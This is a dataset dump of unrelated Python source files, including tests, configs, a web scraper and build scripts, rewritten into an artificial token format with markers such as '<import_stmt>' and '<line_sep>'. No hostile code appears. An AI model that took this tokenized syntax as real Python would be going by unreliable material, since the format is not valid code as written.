content
stringlengths
0
1.55M
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>sys<line_sep>sys.path.append('..')<import_from_stmt>program_config TensorConfig ProgramConfig OpConfig CxxConfig TargetType PrecisionType DataLayoutType Place<import_stmt>numpy<as>np<import_from_stmt>functools partial<import_from_stmt>typing Optional List Callable Dict Any Set<import_stmt>unittest<import_stmt>hypothesis<import_from_stmt>hypothesis given settings seed example assume reproduce_failure<import_stmt>hypothesis.strategies<as>st<def_stmt>sample_program_configs draw#elementwise param <block_start>in_shape_x=draw(st.lists(st.integers(min_value=1 max_value=20) min_size=4 max_size=4))<line_sep>in_shape_y=draw(st.lists(st.integers(min_value=1 max_value=20) min_size=4 max_size=4))<line_sep>assume((in_shape_x[0]<eq>in_shape_y[0]<or>in_shape_x[0]<eq>1<or>in_shape_y[0]<eq>1)<and>(in_shape_x[0]<ge>in_shape_y[0]))<line_sep>assume((in_shape_x[1]<eq>in_shape_y[1]<or>in_shape_x[1]<eq>1<or>in_shape_y[1]<eq>1)<and>(in_shape_x[1]<ge>in_shape_y[1]))<line_sep>assume((in_shape_x[2]<eq>in_shape_y[2]<or>in_shape_x[2]<eq>1<or>in_shape_y[2]<eq>1)<and>(in_shape_x[2]<ge>in_shape_y[2]))<line_sep>assume((in_shape_x[3]<eq>in_shape_y[3]<or>in_shape_x[3]<eq>1<or>in_shape_y[3]<eq>1)<and>(in_shape_x[3]<ge>in_shape_y[3]))<line_sep>axis=-1<line_sep>#scale param scale=draw(st.floats(min_value=0.5 max_value=5))<line_sep>bias=draw(st.floats(min_value=0 max_value=1))<line_sep>alpha=draw(st.floats(min_value=0 max_value=1))<line_sep>bias_after_scale=draw(st.sampled_from([<false> <true>]))<line_sep>elementwise_op=OpConfig(type='elementwise_mul' inputs={"X":["input_data_x"] "Y":["input_data_y"]} outputs={"Out":["elementwise_output_data"]} attrs={"data_format":'nchw' "axis":axis})<line_sep>scale_op=OpConfig(type='scale' inputs={"X":["elementwise_output_data"]} outputs={"Out":["output_data"]} attrs={"scale":scale "bias":bias "alpha":alpha "bias_after_scale":bias_after_scale})<line_sep>ops=[elementwise_op scale_op]<line_sep>program_config=ProgramConfig(ops=ops weights={} inputs={"input_data_x":TensorConfig(shape=in_shape_x) "input_data_y":TensorConfig(shape=in_shape_y)} outputs=["output_data"])<line_sep><return>program_config<block_end>
<import_stmt>pytest<import_stmt>doctest<import_from_stmt>insights.parsers SkipException tuned<import_from_stmt>insights.parsers.tuned Tuned<import_from_stmt>insights.tests context_wrap<line_sep>TUNED_OUTPUT=''' Available profiles: - balanced - desktop - latency-performance - network-latency - network-throughput - powersave - throughput-performance - virtual-guest - virtual-host Current active profile: virtual-guest '''.strip()<line_sep>TUNED_OUTPUT2=''' Available profiles: - balanced - desktop - latency-performance - network-latency - network-throughput - powersave - throughput-performance - virtual-guest - virtual-host It seems that tuned daemon is not running, preset profile is not activated. Preset profile: virtual-guest '''.strip()<line_sep>TUNED_OUTPUT3=''' Available profiles: - balanced - General non-specialized tuned profile - desktop - Optimize for the desktop use-case - hpc-compute - Optimize for HPC compute workloads - latency-performance - Optimize for deterministic performance at the cost of increased power consumption - network-latency - Optimize for deterministic performance at the cost of increased power consumption, focused on low latency network performance - network-throughput - Optimize for streaming network throughput, generally only necessary on older CPUs or 40G+ networks - powersave - Optimize for low power consumption - sap-netweaver - Optimize for SAP NetWeaver - throughput-performance - Broadly applicable tuning that provides excellent performance across a variety of common server workloads - virtual-guest - Optimize for running inside a virtual guest - virtual-guest-vmware - virtual-host - Optimize for running KVM guests Current active profile: virtual-guest-vmware '''.strip()<line_sep>TUNED_OUTPUT4=''' '''.strip()<def_stmt>test_active_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT))<assert_stmt>len(tuned_output.get('available'))<eq>9<assert_stmt>tuned_output.get('active')<eq>'virtual-guest'<assert_stmt>tuned_output.get('available')<eq>['balanced' 'desktop' 'latency-performance' 'network-latency' 'network-throughput' 'powersave' 'throughput-performance' 'virtual-guest' 'virtual-host']<block_end><def_stmt>test_preset_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT2))<assert_stmt>len(tuned_output.get('available'))<eq>9<assert_stmt>tuned_output.get('preset')<eq>'virtual-guest'<assert_stmt>tuned_output.get('available')<eq>['balanced' 'desktop' 'latency-performance' 'network-latency' 'network-throughput' 'powersave' 'throughput-performance' 'virtual-guest' 'virtual-host']<block_end><def_stmt>test_tuned_profile <block_start>tuned_output=Tuned(context_wrap(TUNED_OUTPUT3))<assert_stmt>len(tuned_output.get('available'))<eq>12<assert_stmt>tuned_output.get('preset')<is><none><assert_stmt>tuned_output.get('active')<eq>'virtual-guest-vmware'<assert_stmt>'sap-netweaver'<in>tuned_output.get('available')<assert_stmt>'virtual-guest-vmware'<in>tuned_output.get('available')<with_stmt>pytest.raises(SkipException)<block_start>Tuned(context_wrap(''))<block_end><block_end><def_stmt>test_doc_example <block_start>env={'tuned':Tuned(context_wrap(TUNED_OUTPUT))}<line_sep>failed,total=doctest.testmod(tuned globs=env)<assert_stmt>failed<eq>0<block_end>
<import_stmt>tempfile<import_stmt>gdbremote_testcase<import_from_stmt>lldbsuite.test.lldbtest *<import_from_stmt>lldbsuite.test.decorators *<import_from_stmt>lldbgdbserverutils *<class_stmt>GdbRemoteCompletionTestCase(gdbremote_testcase.GdbRemoteTestCaseBase)<block_start>mydir=TestBase.compute_mydir(__file__)<def_stmt>init_lldb_server self<block_start>self.debug_monitor_exe=get_lldb_server_exe()<if_stmt><not>self.debug_monitor_exe<block_start>self.skipTest("lldb-server exe not found")<block_end>port_file=tempfile.NamedTemporaryFile().name<line_sep>commandline_args=["platform" "--listen" "*:0" "--socket-file" port_file]<line_sep>server=self.spawnSubprocess(get_lldb_server_exe() commandline_args install_remote=<false>)<line_sep>self.assertIsNotNone(server)<line_sep>self.stub_hostname="localhost"<line_sep>self.port=int(lldbutil.wait_for_file_on_target(self port_file))<line_sep>self.sock=self.create_socket()<line_sep>self._server=Server(self.sock server)<line_sep>self.add_no_ack_remote_stream()<block_end><def_stmt>generate_hex_path self target<block_start><return>str(os.path.join(self.getBuildDir() target)).encode().hex()<block_end>@add_test_categories(["llgs"])<def_stmt>test_autocomplete_path self<block_start>self.build()<line_sep>self.init_lldb_server()<line_sep># Test file-included completion when flag is set to 0. self.test_sequence.add_log_lines(["read packet: $qPathComplete:0,{}#00".format(self.generate_hex_path("main")) "send packet: $M{},{}#00".format(self.generate_hex_path("main.d") self.generate_hex_path("main.o"))] <true>)<line_sep># Test directory-only completion when flag is set to 1. os.makedirs(os.path.join(self.getBuildDir() "test"))<line_sep>self.test_sequence.add_log_lines(["read packet: $qPathComplete:1,{}#00".format(self.generate_hex_path("tes")) "send packet: $M{}{}#00".format(self.generate_hex_path("test") os.path.sep.encode().hex())# "test/" or "test\". ] <true>)<line_sep>self.expect_gdbremote_sequence()<block_end><block_end>
# -*- coding: utf-8 -*- <import_stmt>json<import_stmt>re<import_stmt>scrapy<import_from_stmt>locations.items GeojsonPointItem<import_from_stmt>locations.hours OpeningHours<line_sep>DAY_MAPPING={'Monday':'Mo' 'Tuesday':'Tu' 'Wednesday':'We' 'Thursday':'Th' 'Friday':'Fr' 'Saturday':'Sa' 'Sunday':'Su'}<class_stmt>BoneFishGrillSpider(scrapy.Spider)<block_start>download_delay=0.2<line_sep>name="bonefishgrill"<line_sep>allowed_domains=["bonefishgrill.com"]<line_sep>start_urls=('https://www.bonefishgrill.com/locations/all' )<def_stmt>parse self response<block_start>urls=response.xpath('//li[@class="location-row"]/a/@href').extract()<for_stmt>url urls<block_start><yield>scrapy.Request(response.urljoin(url) callback=self.parse_location)<block_end><block_end><def_stmt>parse_location self response<block_start>data=response.xpath('//script[contains(text(), "initLocationDetail")][1]/text()').extract_first()<try_stmt><block_start>properties={'ref':re.search(r'"UnitId":"(.*?)"' data).group(1) 'name':re.search(r'"City":"(.*?)"' data).group(1) 'addr_full':re.search(r'"Address":"(.*?)"' data).group(1) 'city':re.search(r'"City":"(.*?)"' data).group(1) 'state':re.search(r'"State":"(.*?)"' data).group(1) 'postcode':re.search(r'"Zip":"(.*?)"' data).group(1) 'phone':re.search(r'"Phone":"(.*?)"' data).group(1) 'lat':re.search(r'"Latitude":"(.*?)"' data).group(1) 'lon':re.search(r'"Longitude":"(.*?)"' data).group(1) 'website':response.url}<line_sep>hours=self.parse_hours(re.search(r'"Hours":(.*?})' data).group(1))<if_stmt>hours<block_start>properties['opening_hours']=hours<block_end><yield>GeojsonPointItem(**properties)<block_end><except_stmt><block_start><pass><block_end><block_end><def_stmt>parse_hours self response<block_start>opening_hours=OpeningHours()<line_sep>weekdays=response<line_sep>hrs=json.loads(weekdays)<line_sep>WEEKDAYS=['Monday' 'Tuesday' 'Wednesday' 'Thursday' 'Friday' 'Saturday' 'Sunday']<for_stmt>DAY WEEKDAYS<block_start>open=hrs.get(DAY+'Open')<line_sep>close=hrs.get(DAY+'Close')<line_sep>opening_hours.add_range(day=DAY_MAPPING[DAY] open_time=open close_time=close time_format='%H:%M %p')<block_end><return>opening_hours.as_opening_hours()<block_end><block_end>
# Copyright 2018 Google Inc. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Integration test program for Subpar Tests file extraction functionality (zip_safe=False) """<import_stmt>os<import_stmt>pkgutil<import_stmt>sys<def_stmt>main <block_start>print('In extract.py main()')<line_sep># Test that imports are from real files on disk. Slightly tricky # to test, since the 'subpar' package is imported before we # extract and setup sys.path, so we can't "import subpar.test.something" <import_stmt>extract_helper<assert_stmt>os.path.isfile(extract_helper.__file__) (extract_helper.__file__ sys.path)<import_stmt>extract_helper_package<assert_stmt>os.path.isfile(extract_helper_package.__file__) (extract_helper_package.__file__ sys.path)<line_sep># Test resource extraction dat=pkgutil.get_data('extract_helper_package' 'extract_dat.txt')<assert_stmt>(dat<eq>b'Dummy data file for extract.py\n') dat<block_end><if_stmt>__name__<eq>'__main__'<block_start>main()<block_end>
<class_stmt>CurveLoopIterator(object IEnumerator[Curve] IDisposable IEnumerator)<block_start>""" An iterator to a curve loop. """<def_stmt>Dispose self<block_start>""" Dispose(self: CurveLoopIterator) """<line_sep><pass><block_end><def_stmt>MoveNext self<block_start>""" MoveNext(self: CurveLoopIterator) -> bool Increments the iterator to the next item. Returns: True if there is a next available item in this iterator. False if the iterator has completed all available items. """<line_sep><pass><block_end><def_stmt>next self *args<block_start>""" next(self: object) -> object """<line_sep><pass><block_end><def_stmt>ReleaseUnmanagedResources self *args<block_start>""" ReleaseUnmanagedResources(self: CurveLoopIterator,disposing: bool) """<line_sep><pass><block_end><def_stmt>Reset self<block_start>""" Reset(self: CurveLoopIterator) Resets the iterator to the initial state. """<line_sep><pass><block_end><def_stmt>__contains__ self *args<block_start>""" __contains__[Curve](enumerator: IEnumerator[Curve],value: Curve) -> bool """<line_sep><pass><block_end><def_stmt>__enter__ self *args<block_start>""" __enter__(self: IDisposable) -> object """<line_sep><pass><block_end><def_stmt>__exit__ self *args<block_start>""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """<line_sep><pass><block_end><def_stmt>__init__ self *args<block_start>""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """<line_sep><pass><block_end><def_stmt>__iter__ self *args<block_start>""" __iter__(self: IEnumerator) -> object """<line_sep><pass><block_end><def_stmt>__repr__ self *args<block_start>""" __repr__(self: object) -> str """<line_sep><pass><block_end>Current=property(<lambda>self:object() <lambda>self v:<none> <lambda>self:<none>)<line_sep>"""Gets the item at the current position of the iterator. Get: Current(self: CurveLoopIterator) -> Curve """<line_sep>IsValidObject=property(<lambda>self:object() <lambda>self v:<none> <lambda>self:<none>)<line_sep>"""Specifies whether the .NET object represents a valid Revit entity. Get: IsValidObject(self: CurveLoopIterator) -> bool """<block_end>
# This script lists the names of standard library modules # to update Python/stdlib_mod_names.h <import_stmt>_imp<import_stmt>os.path<import_stmt>re<import_stmt>subprocess<import_stmt>sys<import_stmt>sysconfig<line_sep>SRC_DIR=os.path.dirname(os.path.dirname(os.path.dirname(__file__)))<line_sep>STDLIB_PATH=os.path.join(SRC_DIR 'Lib')<line_sep>MODULES_SETUP=os.path.join(SRC_DIR 'Modules' 'Setup')<line_sep>SETUP_PY=os.path.join(SRC_DIR 'setup.py')<line_sep>IGNORE={'__init__' '__pycache__' 'site-packages' # Test modules and packages '__hello__' '__phello__' '__hello_alias__' '__phello_alias__' '__hello_only__' '_ctypes_test' '_testbuffer' '_testcapi' '_testconsole' '_testimportmultiple' '_testinternalcapi' '_testmultiphase' '_xxsubinterpreters' '_xxtestfuzz' 'distutils.tests' 'idlelib.idle_test' 'lib2to3.tests' 'test' 'xxlimited' 'xxlimited_35' 'xxsubtype' }<line_sep># Windows extension modules WINDOWS_MODULES=('_msi' '_overlapped' '_testconsole' '_winapi' 'msvcrt' 'nt' 'winreg' 'winsound')<line_sep># macOS extension modules MACOS_MODULES=('_scproxy' )<line_sep># Pure Python modules (Lib/*.py) <def_stmt>list_python_modules names<block_start><for_stmt>filename os.listdir(STDLIB_PATH)<block_start><if_stmt><not>filename.endswith(".py")<block_start><continue><block_end>name=filename.removesuffix(".py")<line_sep>names.add(name)<block_end><block_end># Packages in Lib/ <def_stmt>list_packages names<block_start><for_stmt>name os.listdir(STDLIB_PATH)<block_start><if_stmt>name<in>IGNORE<block_start><continue><block_end>package_path=os.path.join(STDLIB_PATH name)<if_stmt><not>os.path.isdir(package_path)<block_start><continue><block_end><if_stmt>any(package_file.endswith(".py")<for>package_file os.listdir(package_path))<block_start>names.add(name)<block_end><block_end><block_end># Extension modules built by setup.py <def_stmt>list_setup_extensions names<block_start>cmd=[sys.executable SETUP_PY "-q" "build" "--list-module-names"]<line_sep>output=subprocess.check_output(cmd)<line_sep>output=output.decode("utf8")<line_sep>extensions=output.splitlines()<line_sep>names<augor>set(extensions)<block_end># Built-in and extension modules built by Modules/Setup <def_stmt>list_modules_setup_extensions names<block_start>assign_var=re.compile("^[A-Z]+=")<with_stmt>open(MODULES_SETUP encoding="utf-8")<as>modules_fp<block_start><for_stmt>line modules_fp# Strip comment <block_start>line=line.partition("#")[0]<line_sep>line=line.rstrip()<if_stmt><not>line<block_start><continue><block_end><if_stmt>assign_var.match(line)# Ignore "VAR=VALUE" <block_start><continue><block_end><if_stmt>line<in>("*disabled*" "*shared*")<block_start><continue><block_end>parts=line.split()<if_stmt>len(parts)<l>2<block_start><continue><block_end># "errno errnomodule.c" => write "errno" name=parts[0]<line_sep>names.add(name)<block_end><block_end><block_end># List frozen modules of the PyImport_FrozenModules list (Python/frozen.c). # Use the "./Programs/_testembed list_frozen" command. <def_stmt>list_frozen names<block_start>submodules=set()<for_stmt>name _imp._frozen_module_names()# To skip __hello__, __hello_alias__ and etc. <block_start><if_stmt>name.startswith('__')<block_start><continue><block_end><if_stmt>'.'<in>name<block_start>submodules.add(name)<block_end><else_stmt><block_start>names.add(name)<block_end><block_end># Make sure all frozen submodules have a known parent. <for_stmt>name list(submodules)<block_start><if_stmt>name.partition('.')[0]<in>names<block_start>submodules.remove(name)<block_end><block_end><if_stmt>submodules<block_start><raise>Exception(f'unexpected frozen submodules: {sorted(submodules)}')<block_end><block_end><def_stmt>list_modules <block_start>names=set(sys.builtin_module_names)|set(WINDOWS_MODULES)|set(MACOS_MODULES)<line_sep>list_modules_setup_extensions(names)<line_sep>list_setup_extensions(names)<line_sep>list_packages(names)<line_sep>list_python_modules(names)<line_sep>list_frozen(names)<line_sep># Remove ignored packages and modules <for_stmt>name list(names)<block_start>package_name=name.split('.')[0]<line_sep># package_name can be equal to name <if_stmt>package_name<in>IGNORE<block_start>names.discard(name)<block_end><block_end><for_stmt>name names<block_start><if_stmt>"."<in>name<block_start><raise>Exception("sub-modules must not be listed")<block_end><block_end><return>names<block_end><def_stmt>write_modules fp names<block_start>print("// Auto-generated by Tools/scripts/generate_stdlib_module_names.py." file=fp)<line_sep>print("// List used to create sys.stdlib_module_names." file=fp)<line_sep>print(file=fp)<line_sep>print("static const char* _Py_stdlib_module_names[] = {" file=fp)<for_stmt>name sorted(names)<block_start>print(f'"{name}",' file=fp)<block_end>print("};" file=fp)<block_end><def_stmt>main <block_start><if_stmt><not>sysconfig.is_python_build()<block_start>print(f"ERROR: {sys.executable} is not a Python build" file=sys.stderr)<line_sep>sys.exit(1)<block_end>fp=sys.stdout<line_sep>names=list_modules()<line_sep>write_modules(fp names)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
<import_stmt>pyb<line_sep>print("Executing main.py")<line_sep>led=pyb.LED(1)<line_sep>led.on()<line_sep>pyb.delay(100)<line_sep>led.off()<line_sep>pyb.delay(100)<line_sep>led.on()<line_sep>pyb.delay(100)<line_sep>led.off()<line_sep>
<import_stmt>time<import_stmt>doctest<import_stmt>unittest<import_from_stmt>examples.lists.models List Item<import_from_stmt>django.test TestCase<class_stmt>GenericTestCase(TestCase)<block_start><def_stmt>setUp self<block_start><pass><block_end><def_stmt>tearDown self<block_start><pass><block_end># @unittest.skip("Some reason. If you are reading this in a test run someone did not fill this in.") <def_stmt>test_doctests_standin self# This code just contains the old doctests for this module. They should be most likely split out into their own # tests at some point. <block_start>self.l=List.objects.create(name='To Do')<line_sep># create a couple items using the default position result=self.l.items.create(name='Write Tests').name<line_sep>expected_result='Write Tests'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position'))<line_sep>expected_result=[(u'Write Tests' 0)]<line_sep>self.assertEqual(result expected_result)<line_sep>result=self.l.items.create(name='Exercise').name<line_sep>expected_result='Exercise'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1)]<line_sep>self.assertEqual(result expected_result)<line_sep># create an item with an explicit position result=self.l.items.create(name='Learn to spell Exercise' position=0).name<line_sep>expected_result='Learn to spell Exercise'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Learn to spell Exercise' 0) (u'Write Tests' 1) (u'Exercise' 2)]<line_sep>self.assertEqual(result expected_result)<line_sep># save an item without changing it's position self.exercise=self.l.items.order_by('-position')[0]<line_sep>self.exercise.name='Exercise'<line_sep>self.exercise.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Learn to spell Exercise' 0) (u'Write Tests' 1) (u'Exercise' 2)]<line_sep>self.assertEqual(result expected_result)<line_sep># delete an item self.learn_to_spell=self.l.items.order_by('position')[0]<line_sep>self.learn_to_spell.delete()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1)]<line_sep>self.assertEqual(result expected_result)<line_sep># create a couple more items result=self.l.items.create(name='Drink less Coke').name<line_sep>expected_result='Drink less Coke'<line_sep>self.assertEqual(result expected_result)<line_sep>result=self.l.items.create(name='Go to Bed').name<line_sep>expected_result='Go to Bed'<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Write Tests' 0) (u'Exercise' 1) (u'Drink less Coke' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to end using None self.write_tests=self.l.items.order_by('position')[0]<line_sep>self.write_tests.position=<none><line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Drink less Coke' 1) (u'Go to Bed' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item using negative index self.write_tests.position=-3<line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Write Tests' 1) (u'Drink less Coke' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to position self.write_tests.position=2<line_sep>self.write_tests.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Exercise' 0) (u'Drink less Coke' 1) (u'Write Tests' 2) (u'Go to Bed' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># move item to beginning self.sleep=self.l.items.order_by('-position')[0]<line_sep>self.sleep.position=0<line_sep>self.sleep.save()<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Exercise' 1) (u'Drink less Coke' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep># check auto_now updates time.sleep(1)# sleep to guarantee updated time increases sleep_updated,exercise_updated,eat_better_updated,write_tests_updated=[i.updated<for>i self.l.items.order_by('position')]<line_sep>self.eat_better=self.l.items.order_by('-position')[1]<line_sep>self.eat_better.position=1<line_sep>self.eat_better.save()<line_sep>self.todo_list=list(self.l.items.order_by('position'))<line_sep>self.assertEqual(sleep_updated self.todo_list[0].updated)<line_sep>self.assertLessEqual(eat_better_updated self.todo_list[1].updated)<line_sep>self.assertLessEqual(exercise_updated self.todo_list[2].updated)<line_sep># create an item using negative index # http://github.com/jpwatts/django-positions/issues/#issue/5 result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Write Tests' 3)]<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5=Item(list=self.l name="Fix Issue #5")<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=-1<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5.position=-2<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=-2<line_sep>self.assertEqual(result expected_result)<line_sep>self.fix_issue_5.save()<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=3<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Fix Issue #5' 3) (u'Write Tests' 4)]<line_sep>self.assertEqual(result expected_result)<line_sep># Try again, now that the model has been saved. self.fix_issue_5.position=-2<line_sep>self.fix_issue_5.save()<line_sep>result=self.fix_issue_5.position<line_sep>expected_result=3<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Go to Bed' 0) (u'Drink less Coke' 1) (u'Exercise' 2) (u'Fix Issue #5' 3) (u'Write Tests' 4)]<line_sep>self.assertEqual(result expected_result)<line_sep># create an item using with a position of zero # http://github.com/jpwatts/django-positions/issues#issue/7 self.item0=self.l.items.create(name="Fix Issue #7" position=0)<line_sep>result=self.item0.position<line_sep>expected_result=0<line_sep>self.assertEqual(result expected_result)<line_sep>result=list(self.l.items.values_list('name' 'position').order_by('position'))<line_sep>expected_result=[(u'Fix Issue #7' 0) (u'Go to Bed' 1) (u'Drink less Coke' 2) (u'Exercise' 3) (u'Fix Issue #5' 4) (u'Write Tests' 5)]<line_sep>self.assertEqual(result expected_result)<block_end><block_end>
config={'sampling_rate':22050 'hop_size':256 'model_type':'hifigan_generator' 'hifigan_generator_params':{'out_channels':1 'kernel_size':7 'filters':128 'use_bias':<true> 'upsample_scales':[8 8 2 2] 'stacks':3 'stack_kernel_size':[3 7 11] 'stack_dilation_rate':[[1 3 5] [1 3 5] [1 3 5]] 'use_final_nolinear_activation':<true> 'is_weight_norm':<false> } 'hifigan_discriminator_params':{'out_channels':1 'period_scales':[2 3 5 7 11] 'n_layers':5 'kernel_size':5 'strides':3 'filters':8 'filter_scales':4 'max_filters':512 'is_weight_norm':<false> } 'melgan_discriminator_params':{'out_channels':1 'scales':3 'downsample_pooling':'AveragePooling1D' 'downsample_pooling_params':{'pool_size':4 'strides':2} 'kernel_sizes':[5 3] 'filters':16 'max_downsample_filters':512 'downsample_scales':[4 4 4 4] 'nonlinear_activation':'LeakyReLU' 'nonlinear_activation_params':{'alpha':0.2} 'is_weight_norm':<false> } 'stft_loss_params':{'fft_lengths':[1024 2048 512] 'frame_steps':[120 240 50] 'frame_lengths':[600 1200 240] } 'lambda_feat_match':10.0 'lambda_adv':4.0 'batch_size':16 'batch_max_steps':8192 'batch_max_steps_valid':81920 'remove_short_samples':<true> 'allow_cache':<true> 'is_shuffle':<true> }<line_sep>
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. <import_stmt>argparse<import_stmt>numpy<as>np<import_stmt>paddle<import_stmt>pandas<as>pd<import_stmt>yaml<import_from_stmt>paddle nn<import_from_stmt>paddle.io DataLoader<import_from_stmt>sklearn.metrics classification_report<import_from_stmt>sklearn.metrics precision_recall_fscore_support<import_from_stmt>yacs.config CfgNode<import_from_stmt>paddlespeech.text.models.ernie_linear ErnieLinear<import_from_stmt>paddlespeech.text.models.ernie_linear PuncDataset<import_from_stmt>paddlespeech.text.models.ernie_linear PuncDatasetFromErnieTokenizer<line_sep>DefinedClassifier={'ErnieLinear':ErnieLinear }<line_sep>DefinedLoss={"ce":nn.CrossEntropyLoss }<line_sep>DefinedDataset={'Punc':PuncDataset 'Ernie':PuncDatasetFromErnieTokenizer }<def_stmt>evaluation y_pred y_test<block_start>precision,recall,f1,_=precision_recall_fscore_support(y_test y_pred average=<none> labels=[1 2 3])<line_sep>overall=precision_recall_fscore_support(y_test y_pred average='macro' labels=[1 2 3])<line_sep>result=pd.DataFrame(np.array([precision recall f1]) columns=list(['O' 'COMMA' 'PERIOD' 'QUESTION'])[1:] index=['Precision' 'Recall' 'F1'])<line_sep>result['OVERALL']=overall[:3]<line_sep><return>result<block_end><def_stmt>test args<block_start><with_stmt>open(args.config)<as>f<block_start>config=CfgNode(yaml.safe_load(f))<block_end>print("========Args========")<line_sep>print(yaml.safe_dump(vars(args)))<line_sep>print("========Config========")<line_sep>print(config)<line_sep>test_dataset=DefinedDataset[config["dataset_type"]](train_path=config["test_path"] **config["data_params"])<line_sep>test_loader=DataLoader(test_dataset batch_size=config.batch_size shuffle=<false> drop_last=<false>)<line_sep>model=DefinedClassifier[config["model_type"]](**config["model"])<line_sep>state_dict=paddle.load(args.checkpoint)<line_sep>model.set_state_dict(state_dict["main_params"])<line_sep>model.eval()<line_sep>punc_list=[]<for_stmt>i range(len(test_loader.dataset.id2punc))<block_start>punc_list.append(test_loader.dataset.id2punc[i])<block_end>test_total_label=[]<line_sep>test_total_predict=[]<for_stmt>i,batch enumerate(test_loader)<block_start>input,label=batch<line_sep>label=paddle.reshape(label shape=[-1])<line_sep>y,logit=model(input)<line_sep>pred=paddle.argmax(logit axis=1)<line_sep>test_total_label.extend(label.numpy().tolist())<line_sep>test_total_predict.extend(pred.numpy().tolist())<block_end>t=classification_report(test_total_label test_total_predict target_names=punc_list)<line_sep>print(t)<line_sep>t2=evaluation(test_total_label test_total_predict)<line_sep>print('=========================================================')<line_sep>print(t2)<block_end><def_stmt>main # parse args and config and redirect to train_sp <block_start>parser=argparse.ArgumentParser(description="Test a ErnieLinear model.")<line_sep>parser.add_argument("--config" type=str help="ErnieLinear config file.")<line_sep>parser.add_argument("--checkpoint" type=str help="snapshot to load.")<line_sep>parser.add_argument("--ngpu" type=int default=1 help="if ngpu=0, use cpu.")<line_sep>args=parser.parse_args()<if_stmt>args.ngpu<eq>0<block_start>paddle.set_device("cpu")<block_end><elif_stmt>args.ngpu<g>0<block_start>paddle.set_device("gpu")<block_end><else_stmt><block_start>print("ngpu should >= 0 !")<block_end>test(args)<block_end><if_stmt>__name__<eq>"__main__"<block_start>main()<block_end>
"""dummy_exporter.py Dummy exporter implementation for testing. """<line_sep># pylint: disable=missing-class-docstring <import_from_stmt>slo_generator.exporters.base MetricsExporter<class_stmt>FailExporter(MetricsExporter)<block_start><def_stmt>export_metric self data<block_start><raise>ValueError("Oops !")<block_end><block_end>
